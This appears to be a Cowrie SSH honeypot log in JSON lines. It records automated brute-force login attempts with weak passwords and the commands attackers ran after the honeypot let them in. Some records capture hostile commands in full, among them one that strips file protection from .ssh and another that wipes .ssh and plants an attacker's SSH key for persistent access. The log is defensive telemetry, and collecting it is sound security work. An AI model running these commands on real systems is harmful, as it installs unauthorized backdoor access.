{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:05:43.424651Z","src_ip":"212.227.235.229","session":"38505e77b60d"}
{"eventid":"cowrie.session.closed","duration":180.63171768188477,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:05:43.429361Z","src_ip":"212.227.235.229","session":"38505e77b60d"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:05:43.610908Z","src_ip":"212.227.235.229","session":"cc79ade82405"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:05:46.751667Z","src_ip":"79.127.48.196","session":"bbc009b28871"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:05:46.752454Z","src_ip":"79.127.48.196","session":"bbc009b28871"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48246,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a0f08f51e2d","protocol":"ssh","message":"New connection: 212.227.125.160:48246 (1.2.3.4:22) [session: 0a0f08f51e2d]","sensor":"my-vps","timestamp":"2025-08-31T04:05:56.351804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:05:56.905090Z","src_ip":"212.227.125.160","session":"0a0f08f51e2d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:05:56.906376Z","src_ip":"212.227.125.160","session":"0a0f08f51e2d"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"password","message":"login attempt [mysql/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:05:58.820529Z","src_ip":"212.227.125.160","session":"0a0f08f51e2d"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:06:00.175370Z","src_ip":"212.227.125.160","session":"0a0f08f51e2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55692,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebde1033958d","protocol":"ssh","message":"New connection: 212.227.125.160:55692 (1.2.3.4:22) [session: ebde1033958d]","sensor":"my-vps","timestamp":"2025-08-31T04:06:03.825928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:06:19.035200Z","src_ip":"212.227.125.160","session":"ebde1033958d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:06:19.036230Z","src_ip":"212.227.125.160","session":"ebde1033958d"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:06:21.350275Z","src_ip":"212.227.235.229","session":"80861cc87e61"}
{"eventid":"cowrie.session.closed","duration":"89.1","message":"Connection lost after 89.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:06:33.458429Z","src_ip":"212.227.235.229","session":"80861cc87e61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37204,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbe52057a6cb","protocol":"ssh","message":"New connection: 212.227.235.229:37204 (1.2.3.4:22) [session: cbe52057a6cb]","sensor":"my-vps","timestamp":"2025-08-31T04:06:34.228992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:06:34.959767Z","src_ip":"212.227.235.229","session":"cbe52057a6cb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:06:34.960424Z","src_ip":"212.227.235.229","session":"cbe52057a6cb"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"password1","message":"login attempt [mysql/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:06:40.864976Z","src_ip":"212.227.235.229","session":"cbe52057a6cb"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:06:42.701092Z","src_ip":"212.227.235.229","session":"cbe52057a6cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57124,"dst_ip":"1.2.3.4","dst_port":22,"session":"173664e79879","protocol":"ssh","message":"New connection: 212.227.235.229:57124 (1.2.3.4:22) [session: 173664e79879]","sensor":"my-vps","timestamp":"2025-08-31T04:06:44.220382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:06:44.222021Z","src_ip":"212.227.235.229","session":"173664e79879"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:06:44.820300Z","src_ip":"212.227.235.229","session":"173664e79879"}
{"eventid":"cowrie.login.success","username":"root","password":"QWEqwe!@#123","message":"login attempt [root/QWEqwe!@#123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:06:46.129693Z","src_ip":"212.227.235.229","session":"173664e79879"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:06:47.149355Z","src_ip":"212.227.235.229","session":"173664e79879"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:06:47.150271Z","src_ip":"212.227.235.229","session":"173664e79879"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:06:47.151562Z","src_ip":"212.227.235.229","session":"173664e79879"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:06:47.467482Z","src_ip":"212.227.235.229","session":"173664e79879"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:06:47.716370Z","src_ip":"212.227.125.160","session":"ebde1033958d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:06:48.167323Z","src_ip":"212.227.235.229","session":"173664e79879"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T04:06:48.168002Z","src_ip":"212.227.235.229","session":"173664e79879"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T04:06:48.486593Z","src_ip":"212.227.235.229","session":"173664e79879"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:06:48.487624Z","src_ip":"212.227.235.229","session":"173664e79879"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38884,"dst_ip":"1.2.3.4","dst_port":22,"session":"97124355240a","protocol":"ssh","message":"New connection: 212.227.235.229:38884 (1.2.3.4:22) [session: 97124355240a]","sensor":"my-vps","timestamp":"2025-08-31T04:06:49.233772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:06:49.261571Z","src_ip":"212.227.235.229","session":"97124355240a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48394,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6712963f0b2","protocol":"ssh","message":"New connection: 212.227.235.229:48394 (1.2.3.4:22) [session: c6712963f0b2]","sensor":"my-vps","timestamp":"2025-08-31T04:06:49.278437Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:06:49.588307Z","src_ip":"212.227.235.229","session":"97124355240a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T04:06:50.879519Z","src_ip":"212.227.235.229","session":"97124355240a"}
{"eventid":"cowrie.login.success","username":"root","password":"Liverpool09","message":"login attempt [root/Liverpool09] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:06:52.069585Z","src_ip":"79.127.48.196","session":"bbc009b28871"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:06:52.205317Z","src_ip":"212.227.235.229","session":"97124355240a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38894,"dst_ip":"1.2.3.4","dst_port":22,"session":"d45242113308","protocol":"ssh","message":"New connection: 212.227.235.229:38894 (1.2.3.4:22) [session: d45242113308]","sensor":"my-vps","timestamp":"2025-08-31T04:06:52.520180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:06:52.521171Z","src_ip":"212.227.235.229","session":"d45242113308"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:06:52.841109Z","src_ip":"212.227.235.229","session":"d45242113308"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:06:54.160936Z","src_ip":"212.227.235.229","session":"d45242113308"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:06:54.482942Z","src_ip":"212.227.235.229","session":"d45242113308"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:06:54.485981Z","src_ip":"212.227.235.229","session":"173664e79879"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55120,"dst_ip":"1.2.3.4","dst_port":22,"session":"184b0d79667b","protocol":"ssh","message":"New connection: 212.227.125.160:55120 (1.2.3.4:22) [session: 184b0d79667b]","sensor":"my-vps","timestamp":"2025-08-31T04:06:55.962611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:06:56.349534Z","src_ip":"212.227.125.160","session":"184b0d79667b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:06:56.350576Z","src_ip":"212.227.125.160","session":"184b0d79667b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:06:56.356379Z","src_ip":"212.227.235.229","session":"c6712963f0b2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh